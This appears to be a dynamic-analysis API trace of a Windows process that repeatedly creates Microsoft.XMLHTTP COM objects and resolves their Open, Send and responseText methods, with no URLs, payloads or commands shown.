	[0380.401] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0380.401] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0380.401] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0380.401] ??2@YAPEAX_K@Z () returned 0x62f330
	[0380.401] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0380.401] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0380.401] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0380.401] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0380.401] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0380.401] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0380.402] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0380.404] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0380.404] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0380.404] SysStringLen (param_1=0x0) returned 0x0
	[0380.404] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0380.404] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0380.404] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0380.404] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0380.404] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0380.404] ??2@YAPEAX_K@Z () returned 0x62f310
	[0380.404] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0380.405] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0380.405] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0380.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0380.405] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0380.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0380.405] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0380.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0380.405] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0380.405] SysStringLen (param_1=0x0) returned 0x0
	[0380.405] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0380.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0380.405] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0380.405] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0380.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c77a8) returned 0x0
	[0380.405] ??2@YAPEAX_K@Z () returned 0x62f330
	[0380.405] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c77a8, pUnkSite=0x62f330) 
	[0380.405] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0380.406] XMLHTTPRequest:IUnknown:Release (This=0x49c77a8) returned 0x0
	[0380.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0380.406] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0380.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0380.406] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0380.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0380.406] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0380.406] SysStringLen (param_1=0x0) returned 0x0
	[0380.406] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0380.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0380.406] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7510) returned 0x0
	[0380.406] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0380.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0380.406] ??2@YAPEAX_K@Z () returned 0x62f310
	[0380.406] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0380.406] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0380.406] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0380.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7510) returned 0x0
	[0380.407] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7510) returned 0x3
	[0380.407] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0380.407] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0380.407] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0380.407] longjmp () 
	[0380.407] longjmp () 
	[0380.407] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0380.407] SysStringLen (param_1=0x0) returned 0x0
	[0380.407] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0380.407] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0380.407] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7480) returned 0x0
	[0380.407] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0380.407] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0380.407] ??2@YAPEAX_K@Z () returned 0x62f330
	[0380.407] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f330) 
	[0380.407] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0380.408] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0380.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7480) returned 0x0
	[0380.408] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7480) returned 0x3
	[0380.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0380.408] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0380.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0380.408] longjmp () 
	[0380.408] longjmp () 
	[0380.408] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0380.408] SysStringLen (param_1=0x0) returned 0x0
	[0380.408] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0380.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0380.408] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0380.408] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0380.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0380.408] ??2@YAPEAX_K@Z () returned 0x62f310
	[0380.409] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0380.409] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0380.409] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0380.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0380.409] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0380.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0380.409] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0380.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0380.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0380.409] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0380.409] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0380.572] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0380.572] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0380.572] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
